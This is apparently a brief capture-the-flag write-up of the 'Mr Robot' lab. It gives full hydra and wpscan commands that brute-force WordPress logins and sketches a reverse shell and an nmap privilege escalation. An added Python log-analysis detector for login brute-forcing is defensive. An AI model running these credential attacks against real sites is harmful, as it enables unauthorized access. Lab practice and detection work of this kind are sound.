CTF Mr Robot

nmap

Closed, but that's OK; THM takes a long time to load.

Gobuster

WordPress login
http://10.10.185.72/wp-login.php

robots.txt

So…

WordPress

Find the user

hydra -L fsocity.dic -p admin 10.10.185.72 -V http-form-post "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.185.72%2Fwp-admin%2F&testcookie=1:F=Invalid username."

Find the password

wpscan -v -U user.txt -P fsocity.dic.sort --url http://10.10.185.72/wp-login.php
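
What the two guessing runs above look like from the server side, as an added detection example that is not part of the original write-up. It assumes Apache combined-format access logs and default WordPress behaviour (a failed login re-renders the form with HTTP 200, a successful one redirects with 302); the log lines, IP addresses and threshold are constructed.

```python
import re
from collections import defaultdict

# Apache combined log format: ip, ident, user, [time], "METHOD path proto", status
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')


def find_login_bruteforce(lines, threshold=5):
    """Return {ip: {"failed": n, "login_after_failures": bool}} for noisy sources.

    Assumption: POST /wp-login.php answered with 200 is a failed attempt and
    302 is a successful login (default WordPress behaviour).
    """
    failed = defaultdict(int)
    findings = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, method, path, status = m.groups()
        if method != "POST" or path.split("?")[0] != "/wp-login.php":
            continue
        if status == "200":
            failed[ip] += 1
            if failed[ip] >= threshold:
                findings.setdefault(ip, {"failed": 0, "login_after_failures": False})
                findings[ip]["failed"] = failed[ip]
        elif status == "302" and ip in findings:
            # A success after many failures means the guessing probably worked.
            findings[ip]["login_after_failures"] = True
    return findings


def _line(ip, sec, method, path, status):
    # Helper that builds one constructed log line for the sample below.
    return (f'{ip} - - [01/Jan/2024:10:00:{sec:02d} +0000] '
            f'"{method} {path} HTTP/1.1" {status} 3721 "-" "-"')


# Constructed sample: one noisy source, one user who mistypes a password once.
SAMPLE = ([_line("10.9.0.5", s, "POST", "/wp-login.php", 200) for s in range(6)]
          + [_line("10.9.0.5", 6, "POST", "/wp-login.php", 302),
             _line("10.9.0.20", 7, "GET", "/wp-login.php", 200),
             _line("10.9.0.20", 8, "POST", "/wp-login.php", 200),
             _line("10.9.0.20", 9, "POST", "/wp-login.php", 302)])

if __name__ == "__main__":
    for ip, info in find_login_bruteforce(SAMPLE).items():
        print(ip, info)
```

Access logs do not record POST bodies, so the username and password phases look the same here; only the volume of failures and the 200-to-302 transition are visible.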

Reverse shell

Zip it, send it, listen and activate.

Robot

md5

root

lse.sh

lse.sh is in my current directory.

/usr/local/bin/nmap

nmap exploit

https://gtfobins.github.io/gtfobins/nmap/